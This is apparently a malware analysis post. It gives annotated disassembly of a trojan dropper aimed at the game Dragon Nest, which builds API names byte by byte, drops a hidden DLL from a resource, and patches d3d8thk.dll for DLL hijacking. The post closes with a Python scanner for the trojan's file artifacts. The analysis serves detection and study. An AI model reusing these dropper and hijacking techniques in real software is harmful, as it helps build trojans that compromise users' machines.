004032B7 |. 50 push eax ; "GetFileAttributesA"
004032B8 |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; "kernel32.dll"
004032BB |. 50 push eax
0040334B |. 885D FA mov byte ptr [ebp-6], bl
0040334E |. FFD6 call esi ; LoadLibraryA kernel32.dll
00403350 |. 50 push eax
00403351 |. E8 DBE5FFFF call 00401931 ; GetProcAddress GetFileAttributesA
00403356 |. 59 pop ecx
00403357 |. 8BF8 mov edi, eax ; edi = address of GetFileAttributesA
00403359 |. 59 pop ecx
0040335A |. 8D45 E8 lea eax, dword ptr [ebp-18] ; "SetFileAttributesA"
0040335D |. 50 push eax
0040335E |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; "kernel32.dll"
00403361 |. 50 push eax
00403362 |. FFD6 call esi ; LoadLibraryA
00403364 |. 50 push eax
00403365 |. E8 C7E5FFFF call 00401931 ; GetProcAddress SetFileAttributesA
0040336A |. 59 pop ecx
0040336B |. 8945 E0 mov dword ptr [ebp-20], eax
0040336E |. 59 pop ecx
0040336F |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; windows\system\kb****.axs
00403375 |. 50 push eax
00403376 |. FFD7 call edi ; GetFileAttributesA
00403378 |. 0C 02 or al, 2 ; add FILE_ATTRIBUTE_HIDDEN
0040337A |. 50 push eax ; attributes with the hidden bit set
0040337B |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8]
00403381 |. 50 push eax ; windows\system\kb****.axs
00403382 |. FF55 E0 call dword ptr [ebp-20] ; SetFileAttributesA
00403385 |. EB 36 jmp short 004033BD
00403387 |> FF75 0C push dword ptr [ebp+C]
0040338A |. C645 DC 4C mov byte ptr [ebp-24], 4C ; fill "LoadDll"
0040338E |. C645 DD 6F mov byte ptr [ebp-23], 6F
00403392 |. C645 DE 61 mov byte ptr [ebp-22], 61
00403396 |. C645 DF 64 mov byte ptr [ebp-21], 64
0040339A |. C645 E0 44 mov byte ptr [ebp-20], 44
0040339E |. C645 E1 6C mov byte ptr [ebp-1F], 6C
004033A2 |. C645 E2 6C mov byte ptr [ebp-1E], 6C
004033A6 |. 885D E3 mov byte ptr [ebp-1D], bl
004033A9 |. FFD6 call esi ; LoadLibraryA: load the dropped bin
004033AB |. 8D4D DC lea ecx, dword ptr [ebp-24]
004033AE |. 51 push ecx ; "LoadDll"
004033AF |. 50 push eax
004033B0 |. E8 7CE5FFFF call 00401931 ; GetProcAddress kb****.bin!LoadDll
004033B5 |. 59 pop ecx
004033B6 |. 3BC3 cmp eax, ebx ; was the LoadDll address resolved?
004033B8 |. 59 pop ecx
004033B9 |. 74 02 je short 004033BD ; jump if not
004033BB |. FFD0 call eax ; call LoadDll
004033BD |> 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4]
004033C3 |. 50 push eax ; absolute path of the mfc42.log file
004033C4 |. E8 66E3FFFF call 0040172F ; strlen
004033C9 |. 85C0 test eax, eax
004033CB |. 59 pop ecx
004033CC |. 0F84 F5000000 je 004034C7 ; jump if it returned 0
004033D2 |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4]
004033D8 |. 53 push ebx
004033D9 |. 50 push eax ; absolute path of the mfc42.log file
004033DA |. FF75 0C push dword ptr [ebp+C] ; absolute path of the dropped bin
004033DD |. FF95 58FFFFFF call dword ptr [ebp-A8] ; CopyFileA: copy the dropped bin into the game directory as mfc42.log
004033E3 |. 85C0 test eax, eax
004033E5 |. 0F84 DC000000 je 004034C7 ; jump if the copy failed
004033EB |. 395D C4 cmp dword ptr [ebp-3C], ebx
004033EE |. 0F84 D3000000 je 004034C7
004033F4 |. 8D45 E8 lea eax, dword ptr [ebp-18]
004033F7 |. C645 E8 47 mov byte ptr [ebp-18], 47 ; eax = "GetFileAttributesA"
004033FB |. 50 push eax
004033FC |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; "kernel32.dll"
004033FF |. 50 push eax
00403400 |. C645 E9 65 mov byte ptr [ebp-17], 65
0040348F |. 885D DA mov byte ptr [ebp-26], bl
00403492 |. FFD6 call esi ; LoadLibraryA kernel32.dll
00403494 |. 50 push eax
00403495 |. E8 97E4FFFF call 00401931 ; GetProcAddress GetFileAttributesA
0040349A |. 59 pop ecx
0040349B |. 8BF8 mov edi, eax ; edi = address of GetFileAttributesA
0040349D |. 59 pop ecx
0040349E |. 8D45 C8 lea eax, dword ptr [ebp-38] ; "SetFileAttributesA"
004034A1 |. 50 push eax
004034A2 |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; "kernel32.dll"
004034A5 |. 50 push eax
004034A6 |. FFD6 call esi ; LoadLibraryA kernel32.dll
004034A8 |. 50 push eax
004034A9 |. E8 83E4FFFF call 00401931 ; GetProcAddress SetFileAttributesA
004034AE |. 59 pop ecx
004034AF |. 8BF0 mov esi, eax ; esi = address of SetFileAttributesA
004034B1 |. 59 pop ecx
004034B2 |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4]
004034B8 |. 50 push eax ; absolute path of the mfc42.log file
004034B9 |. FFD7 call edi ; GetFileAttributesA
004034BB |. 0C 02 or al, 2 ; set the hidden attribute
004034BD |. 50 push eax
004034BE |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4]
004034C4 |. 50 push eax
004034C5 |. FFD6 call esi ; SetFileAttributesA
004034C7 |> 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8] ; kb****.axs
004034CD |. BE 1C704000 mov esi, 0040701C ; "d3d8thk.dll"
004034D2 |. 50 push eax
004034D3 |. 56 push esi
004034D4 |. E8 FEEEFFFF call 004023D7 ; copy and patch "system dir\d3d8thk.dll"
004034D9 |. 0FB6C0 movzx eax, al
004034DC |. 59 pop ecx
004034DD |. 3BC3 cmp eax, ebx
004034DF |. 59 pop ecx
004034E0 |. 75 04 jnz short 004034E6
004034E2 |> 33C0 xor eax, eax
004034E4 |. EB 2D jmp short 00403513
004034E6 |> 395D C4 cmp dword ptr [ebp-3C], ebx
004034E9 |. 74 1E je short 00403509
004034EB |. 8D85 FCF6FFFF lea eax, dword ptr [ebp-904] ; buffer
004034F1 |. 50 push eax
004034F2 |. 8D85 00F8FFFF lea eax, dword ptr [ebp-800]
004034F8 |. 50 push eax ; game directory
004034F9 |. 56 push esi ; "d3d8thk.dll"
004034FA |. E8 E61B0000 call 004050E5 ; copy "system dir\d3d8thk.dll.dat" to "game dir\d3d8thk.dll"
004034FF |. 0FB6C0 movzx eax, al ; 1
00403502 |. 83C4 0C add esp, 0C
00403505 |. 3BC3 cmp eax, ebx
00403507 |. 75 07 jnz short 00403510 ; jump if the virus code was written successfully
00403509 |> 56 push esi ; "d3d8thk.dll"
0040350A |. E8 38160000 call 00404B47
0040350F |. 59 pop ecx
00403510 |> 6A 01 push 1
00403512 |. 58 pop eax
00403513 |> 5F pop edi
00403514 |. 5E pop esi
00403515 |. 5B pop ebx
00403516 |. C9 leave
00403517 \. C3 retn
[Segment 2]
This segment is a sub-procedure of the first segment: it drops a file named kb****.bin into the system temp directory, where each * is a random digit 0-9.
00402605 /$ 55 push ebp
00402606 |. 8BEC mov ebp, esp
00402608 |. 81EC C8010000 sub esp, 1C8
0040260E |. 53 push ebx
0040260F |. 56 push esi
00402610 |. 57 push edi
00402611 |. 6A 40 push 40
00402613 |. 33DB xor ebx, ebx
00402615 |. 59 pop ecx ; ecx = 0x40
00402616 |. 33C0 xor eax, eax
00402618 |. 8DBD 39FEFFFF lea edi, dword ptr [ebp-1C7]
0040261E |. 889D 38FEFFFF mov byte ptr [ebp-1C8], bl
00402624 |. 8B35 00604000 mov esi, dword ptr [<&kernel32.LoadLibraryA>] ; kernel32.LoadLibraryA
0040262A |. F3:AB rep stos dword ptr es:[edi]
0040262C |. 66:AB stos word ptr es:[edi]
0040262E |. AA stos byte ptr es:[edi]
0040262F |. 8D45 F0 lea eax, dword ptr [ebp-10]
00402632 |. C645 E4 43 mov byte ptr [ebp-1C], 43
00402636 |. 50 push eax ; /FileName
00402637 |. C645 E5 72 mov byte ptr [ebp-1B], 72 ; |fill "CreateFileA"
0040263B |. C645 E6 65 mov byte ptr [ebp-1A], 65 ; |
0040263F |. C645 E7 61 mov byte ptr [ebp-19], 61 ; |
00402643 |. C645 E8 74 mov byte ptr [ebp-18], 74 ; |
00402647 |. C645 E9 65 mov byte ptr [ebp-17], 65 ; |
0040264B |. C645 EA 46 mov byte ptr [ebp-16], 46 ; |
0040264F |. C645 EB 69 mov byte ptr [ebp-15], 69 ; |
00402653 |. C645 EC 6C mov byte ptr [eb-14], 6C ; |
00402657 |. C645 ED 65 mov byte ptr [ebp-13], 65 ; |
0040265B |. C645 EE 41 mov byte ptr [ebp-12], 41 ; |
0040265F |. 885D EF mov byte ptr [ebp-11], bl ; |
00402662 |. C645 F0 4B mov byte ptr [ebp-10], 4B ; |fill "kernel32.dll"
00402666 |. C645 F1 65 mov byte ptr [ebp-F], 65 ; |
0040266A |. C645 F2 72 mov byte ptr [ebp-E], 72 ; |
0040266E |. C645 F3 6E mov byte ptr [ebp-D], 6E ; |
00402672 |. C645 F4 65 mov byte ptr [ebp-C], 65 ; |
00402676 |. C645 F5 6C mov byte ptr [ebp-B], 6C ; |
0040267A |. C645 F6 33 mov byte ptr [ebp-A], 33 ; |
0040267E |. C645 F7 32 mov byte ptr [ebp-9], 32 ; |
00402682 |. C645 F8 2E mov byte ptr [ebp-8], 2E ; |
00402686 |. C645 F9 64 mov byte ptr [ebp-7], 64 ; |
0040268A |. C645 FA 6C mov byte ptr [ebp-6], 6C ; |
0040268E |. C645 FB 6C mov byte ptr [ebp-5], 6C ; |
00402692 |. 885D FC mov byte ptr [ebp-4], bl ; |
00402695 |. FFD6 call esi ; \LoadLibraryA Kernel32.dll
00402697 |. 8BF8 mov edi, eax
00402699 |. 3BFB cmp edi, ebx
0040269B |. 0F84 6B030000 je 00402A0C ; did the load succeed?
004026A1 |. 8D45 A4 lea eax, dword ptr [ebp-5C]
004026A4 |. C645 A4 47 mov byte ptr [ebp-5C], 47
004026A8 |. 50 push eax
004026A9 |. 57 push edi
004026AA |. C645 A5 65 mov byte ptr [ebp-5B], 65 ; fill "GetTempPathA"
004026AE |. C645 A6 74 mov byte ptr [ebp-5A], 74
004026B2 |. C645 A7 54 mov byte ptr [ebp-59], 54
004026B6 |. C645 A8 65 mov byte ptr [ebp-58], 65
004026BA |. C645 A9 6D mov byte ptr [ebp-57], 6D
004026BE |. C645 AA 70 mov byte ptr [ebp-56], 70
004026C2 |. C645 AB 50 mov byte ptr [ebp-55], 50
004026C6 |. C645 AC 61 mov byte ptr [ebp-54], 61
004026CA |. C645 AD 74 mov byte ptr [ebp-53], 74
004026CE |. C645 AE 68 mov byte ptr [ebp-52], 68
004026D2 |. C645 AF 41 mov byte ptr [ebp-51], 41
004026D6 |. 885D B0 mov byte ptr [ebp-50], bl
004026D9 |. E8 53F2FFFF call 00401931 ; GetProcAddress GetTempPathA
004026DE |. 59 pop ecx
004026DF |. 59 pop ecx
004026E0 |. 8D8D 38FEFFFF lea ecx, dword ptr [ebp-1C8]
004026E6 |. 51 push ecx ; Buffer
004026E7 |. 68 04010000 push 104 ; length = 0x104
004026EC |. FFD0 call eax
004026EE |. 85C0 test eax, eax
004026F0 |. 0F84 16030000 je 00402A0C ; was the system temp folder obtained?
004026F6 |. 8D45 94 lea eax, dword ptr [ebp-6C]
004026F9 |. C645 94 46 mov byte ptr [ebp-6C], 46
004026FD |. 50 push eax
004026FE |. 57 push edi
004026FF |. C645 95 69 mov byte ptr [ebp-6B], 69 ; fill "FindResourceA"
00402806 |. E8 26F1FFFF call 00401931 ; GetProcAddress FindResourceA
0040280B |. 8985 5CFFFFFF mov dword ptr [ebp-A4], eax
00402811 |. 8D45 84 lea eax, dword ptr [ebp-7C]
00402814 |. 50 push eax
00402815 |. 57 push edi
00402816 |. E8 16F1FFFF call 00401931 ; GetProcAddress SizeofResource
0040281B |. 8985 64FFFFFF mov dword ptr [ebp-9C], eax
00402821 |. 8D45 B4 lea eax, dword ptr [ebp-4C]
00402824 |. 50 push eax
00402825 |. 57 push edi
00402826 |. E8 06F1FFFF call 00401931 ; GetProcAddress LoadResource
0040282B |. 8985 60FFFFFF mov dword ptr [ebp-A0], eax
00402831 |. 8D45 C4 lea eax, dword ptr [ebp-3C]
00402834 |. 50 push eax
00402835 |. 57 push edi
00402836 |. E8 F6F0FFFF call 00401931 ; GetProcAddress LockResource
0040283B |. 8985 74FFFFFF mov dword ptr [ebp-8C], eax
00402841 |. 8D45 D4 lea eax, dword ptr [ebp-2C]
00402844 |. 50 push eax
00402845 |. 57 push edi
00402846 |. E8 E6F0FFFF call 00401931 ; GetProcAddress FreeResource
0040284B |. 6A 07 push 7
0040284D |. 8985 68FFFFFF mov dword ptr [ebp-98], eax
00402853 |. 59 pop ecx ; ecx = 7
00402854 |. 33C0 xor eax, eax
00402856 |. 8DBD 3DFFFFFF lea edi, dword ptr [ebp-C3]
0040285C |. 53 push ebx ; /timer
0040285D |. F3:AB rep stos dword ptr es:[edi] ; |
0040285F |. 66:AB stos word ptr es:[edi] ; |
00402861 |. AA stos byte ptr es:[edi] ; |
00402862 |. C685 3CFFFFFF 6B mov byte ptr [ebp-C4], 6B ; |ebp-C4 is the start of a char array; its first two chars are set to "kb"
00402869 |. C685 3DFFFFFF 62 mov byte ptr [ebp-C3], 62 ; |
00402870 |. FF15 90604000 call dword ptr [<&MSVCRT.time>] ; \time
00402876 |. 50 push eax ; /seed
00402877 |. FF15 8C604000 call dword ptr [<&MSVCRT.srand>] ; \seed the random generator with the current time
0040287D |. 83C4 30 add esp, 30
00402880 |. 6A 02 push 2
00402882 |. 5F pop edi ; the next 10 instructions are a small loop that fills positions 3..6 of the char array (edi = 2..5) with random digits 0-9
00402883 |> FF15 88604000 /call dword ptr [<&MSVCRT.rand>] ; [rand
00402889 |. 6A 0A |push 0A
0040288B |. 99 |cdq
0040288C |. 59 |pop ecx ; ecx = 0x0A
0040288D |. F7F9 |idiv ecx ; eax = rand() / 0x0A, so dl = 0..9
0040288F |. 80C2 30 |add dl, 30 ; add 0x30 to convert to the ASCII digit
00402892 |. 88943D 3CFFFFFF |mov byte ptr [ebp+edi-C4], dl ; store it into the char array
00402899 |. 47 |inc edi ; index++
0040289A |. 83FF 06 |cmp edi, 6
0040289D |.^ 7C E4 \jl short 00402883 ; loop
0040289F |. C6843D 3CFFFFFF 2E mov byte ptr [ebp+edi-C4], 2E ; append 0x2E '.' to the char array
004028A7 |. 47 inc edi
004028A8 |. 8D85 3CFFFFFF lea eax, dword ptr [ebp-C4] ; array address
004028AE |. C6843D 3CFFFFFF 62 mov byte ptr [ebp+edi-C4], 62 ; append 0x62 'b'
004028B6 |. 47 inc edi ; index++
004028B7 |. 50 push eax
004028B8 |. 8D85 38FEFFFF lea eax, dword ptr [ebp-1C8] ; eax = temp directory
004028BE |. C6843D 3CFFFFFF 69 mov byte ptr [ebp+edi-C4], 69 ; append 0x69 'i'
004028C6 |. 47 inc edi
004028C7 |. 50 push eax
004028C8 |. C6843D 3CFFFFFF 6E mov byte ptr [ebp+edi-C4], 6E ; append 0x6E 'n'
004028D0 |. 889C3D 3DFFFFFF mov byte ptr [ebp+edi-C3], bl ; terminating 0
004028D7 |. E8 69EEFFFF call 00401745 ; append the randomly generated .bin file name to the temp directory path
004028DC |. 8D85 38FEFFFF lea eax, dword ptr [ebp-1C8]
004028E2 |. 50 push eax ; push the absolute file path
004028E3 |. FF75 08 push dword ptr [ebp+8] ; push the buffer pointer
004028E6 |. E8 63EDFFFF call 0040164E ; copies the generated absolute path into the heap buffer
004028EB |. 83C4 10 add esp, 10
004028EE |. 899D 70FFFFFF mov dword ptr [ebp-90], ebx
004028F4 |. 53 push ebx ; /pModule
004028F5 |. FF15 04604000 call dword ptr [<&kernel32.GetModuleHandleA>] ; \HMODULE of the current process
004028FB |. FF75 0C push dword ptr [ebp+C] ; "WMAT"
004028FE |. 8BF8 mov edi, eax
00402900 |. FF75 10 push dword ptr [ebp+10] ; 0x75
00402903 |. 57 push edi
00402904 |. FF95 5CFFFFFF call dword ptr [ebp-A4] ; FindResourceA: find the resource named WMAT
0040290A |. 8945 08 mov dword ptr [ebp+8], eax
0040290D |. 50 push eax
0040290E |. 58 pop eax
0040290F |. 395D 08 cmp dword ptr [ebp+8], ebx
00402912 |. 0F84 F4000000 je 00402A0C ; NULL?
00402918 |. FF75 08 push dword ptr [ebp+8] ; push the WMAT resource handle
0040291B |. 57 push edi ; push the module base
0040291C |. FF95 60FFFFFF call dword ptr [ebp-A0] ; LoadResource: load the resource
00402922 |. 3BC3 cmp eax, ebx
00402924 |. 8945 0C mov dword ptr [ebp+C], eax
00402927 |. 0F84 DF000000 je 00402A0C ; did LoadResource succeed?
0040292D |. 50 push eax ; pass the resource's memory handle
0040292E |. FF95 74FFFFFF call dword ptr [ebp-8C] ; SetHandleCount (this slot was resolved as LockResource above); the argument passed looks wrong, but it has no effect
00402934 |. 3BC3 cmp eax, ebx
00402936 |. 8985 74FFFFFF mov dword ptr [ebp-8C], eax
0040293C |. 0F84 D8000000 je 00402A1A ; check the result
00402942 |. FF75 08 push dword ptr [ebp+8] ; resource handle
00402945 |. 57 push edi ; HMODULE
00402946 |. FF95 64FFFFFF call dword ptr [ebp-9C] ; SizeofResource: get the resource size
0040294C |. 8945 10 mov dword ptr [ebp+10], eax ; the size is 0x5200
0040294F |. 8D45 E4 lea eax, dword ptr [ebp-1C] ; eax = "CreateFileA"
00402952 |. 50 push eax
00402953 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; eax = "Kernel32.dll"
00402956 |. 50 push eax
00402957 |. FFD6 call esi ; LoadLibraryA Kernel32.dll
00402959 |. 50 push eax
0040295A |. E8 D2EFFFFF call 00401931 ; GetProcAddress: resolve CreateFileA
0040295F |. 59 pop ecx
00402960 |. 8BF8 mov edi, eax
00402962 |. 59 pop ecx
00402963 |. 8D85 78FFFFFF lea eax, dword ptr [ebp-88]
00402969 |. 50 push eax ; push the address first, fill in its contents afterwards
0040296A |. 8D45 F0 lea eax, dword ptr [ebp-10]
0040296D |. 50 push eax
0040296E |. C685 78FFFFFF 43 mov byte ptr [ebp-88], 43 ; fill "CloseHandle"
00402975 |. C685 79FFFFFF 6C mov byte ptr [ebp-87], 6C
0040297C |. C685 7AFFFFFF 6F mov byte ptr [ebp-86], 6F
00402983 |. C685 7BFFFFFF 73 mov byte ptr [ebp-85], 73
0040298A |. C685 7CFFFFFF 65 mov byte ptr [ebp-84], 65
00402991 |. C685 7DFFFFFF 48 mov byte ptr [ebp-83], 48
00402998 |. C685 7EFFFFFF 61 mov byte ptr [ebp-82], 61
0040299F |. C685 7FFFFFFF 6E mov byte ptr [ebp-81], 6E
004029A6 |. C645 80 64 mov byte ptr [ebp-80], 64
004029AA |. C645 81 6C mov byte ptr [ebp-7F], 6C
004029AE |. C645 82 65 mov byte ptr [ebp-7E], 65
004029B2 |. 885D 83 mov byte ptr [ebp-7D], bl
004029B5 |. FFD6 call esi ; LoadLibraryA Kernel32.dll
004029B7 |. 50 push eax
004029B8 |. E8 74EFFFFF call 00401931 ; GetProcAddress CloseHandle
004029BD |. 59 pop ecx
004029BE |. 8945 08 mov dword ptr [ebp+8], eax
004029C1 |. 59 pop ecx
004029C2 |. 8D85 38FEFFFF lea eax, dword ptr [ebp-1C8]
004029C8 |. 53 push ebx ; 0 (hTemplateFile)
004029C9 |. 53 push ebx ; 0 (dwFlagsAndAttributes)
004029CA |. 6A 02 push 2 ; CREATE_ALWAYS
004029CC |. 53 push ebx ; 0 (security attributes)
004029CD |. 53 push ebx ; 0 (share mode)
004029CE |. 68 000000C0 push C0000000 ; GENERIC_READ | GENERIC_WRITE
004029D3 |. 50 push eax ; absolute path of the file; name kb****.bin, each * in 0..9
004029D4 |. FFD7 call edi ; CreateFileA
004029D6 |. 8BF0 mov esi, eax
004029D8 |. 83FE FF cmp esi, -1
004029DB |. 74 39 je short 00402A16 ; was the file created?
004029DD |. 8D85 6CFFFFFF lea eax, dword ptr [ebp-94]
004029E3 |. 53 push ebx ; /pOverlapped
004029E4 |. 50 push eax ; |pBytesWritten
004029E5 |. FF75 10 push dword ptr [ebp+10] ; |nBytesToWrite
004029E8 |. FFB5 74FFFFFF push dword ptr [ebp-8C] ; |resource address
004029EE |. 56 push esi ; |hFile
004029EF |. FF15 10604000 call dword ptr [<&kernel32.WriteFile>] ; \WriteFile: dump the resource into the created file
004029F5 |. 3BC3 cmp eax, ebx
004029F7 |. 8985 70FFFFFF mov dword ptr [ebp-90], eax
004029FD |. 56 push esi
004029FE |. 75 10 jnz short 00402A10 ; jump if the write succeeded
00402A00 |. FF55 08 call dword ptr [ebp+8] ; otherwise CloseHandle
00402A03 |. FF75 0C push dword ptr [ebp+C] ; push the resource address
00402A06 |. FF95 68FFFFFF call dword ptr [ebp-98] ; FreeResource (this API is obsolete)
00402A0C |> 33C0 xor eax, eax
00402A0E |. EB 19 jmp short 00402A29
00402A10 |> FF15 0C604000 call dword ptr [<&kernel32.FlushFileBuffers>] ; \finish the write
00402A16 |> 56 push esi
00402A17 |. FF55 08 call dword ptr [ebp+8] ; CloseHandle: close the file handle
00402A1A |> FF75 0C push dword ptr [ebp+C]
00402A1D |. FF95 68FFFFFF call dword ptr [ebp-98] ; FreeResource
00402A23 |. 8B85 70FFFFFF mov eax, dword ptr [ebp-90]
00402A29 |> 5F pop edi
00402A2A |. 5E pop esi
00402A2B |. 5B pop ebx
00402A2C |. C9 leave
00402A2D \. C3 retn
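The file names the dropper above and the core procedure leave behind (steps 1, 5, 7, 8, 12, 13, 15 and 20 in the description) give a simple host check. This is an added Python example and not part of the original post; the location keys (temp, windir, system, dllcache, game) and the directory tree the demo scans are my own constructions, and the scan only looks at names, not at file contents or attributes.

```python
import os
import re
import tempfile

# File names from the walkthrough above, keyed by where the trojan puts them.
# Location keys are my own: temp = %TEMP%, windir = Windows directory,
# system = windir\system, dllcache = windir\DllCache, game = Dragon Nest directory.
ARTIFACTS = [
    ("temp",     re.compile(r"^kb\d{4}\.bin$", re.I),       "dropped hook DLL (step 1)"),
    ("temp",     re.compile(r"^tempVidio\.bat$", re.I),      "self-delete batch file (step 20)"),
    ("system",   re.compile(r"^kb\d{4}\.axs$", re.I),       "hidden copy of the hook DLL (step 5)"),
    ("game",     re.compile(r"^mfc42\.log$", re.I),          "hidden copy of the hook DLL (step 7)"),
    ("windir",   re.compile(r"^d3d8thk\.dll\.dat$", re.I),   "patched d3d8thk.dll staging copy (step 8)"),
    ("game",     re.compile(r"^d3d8thk\.dll$", re.I),        "patched d3d8thk.dll next to the game (step 12)"),
    ("windir",   re.compile(r"^d3d8thk\.dll\.[A-Z]{4}$"),    "renamed original d3d8thk.dll (step 13)"),
    ("system",   re.compile(r"^d3d8thk\.dll\.[A-Z]{4}$"),    "renamed original d3d8thk.dll (step 13)"),
    ("dllcache", re.compile(r"^d3d8thk\.dll\.[A-Z]{4}$"),    "renamed original d3d8thk.dll (step 15)"),
]


def scan(roots: dict) -> list:
    """Return (path, description) for every file matching an artifact pattern.
    `roots` maps the location keys above to directories; missing keys are skipped."""
    hits = []
    for key, pattern, description in ARTIFACTS:
        directory = roots.get(key)
        if not directory or not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            if pattern.match(name):
                hits.append((os.path.join(directory, name), description))
    return hits


def demo() -> list:
    """Build a constructed directory tree with some of the artifacts plus a few
    benign files, then scan it. Nothing here touches a real Windows directory."""
    base = tempfile.mkdtemp(prefix="dn_scan_")
    roots = {key: os.path.join(base, key) for key in ("temp", "windir", "system", "dllcache", "game")}
    for directory in roots.values():
        os.makedirs(directory)
    planted = ["temp/kb4711.bin", "system/kb4711.axs", "windir/d3d8thk.dll.dat",
               "system/d3d8thk.dll.QXZR", "game/mfc42.log"]
    benign = ["game/DragonNest.exe", "windir/notepad.exe", "system/d3d8thk.dll.dat.bak"]
    for rel in planted + benign:
        with open(os.path.join(base, rel), "wb") as fh:
            fh.write(b"\0")
    return scan(roots)


if __name__ == "__main__":
    for path, description in demo():
        print(f"{description}: {path}")
```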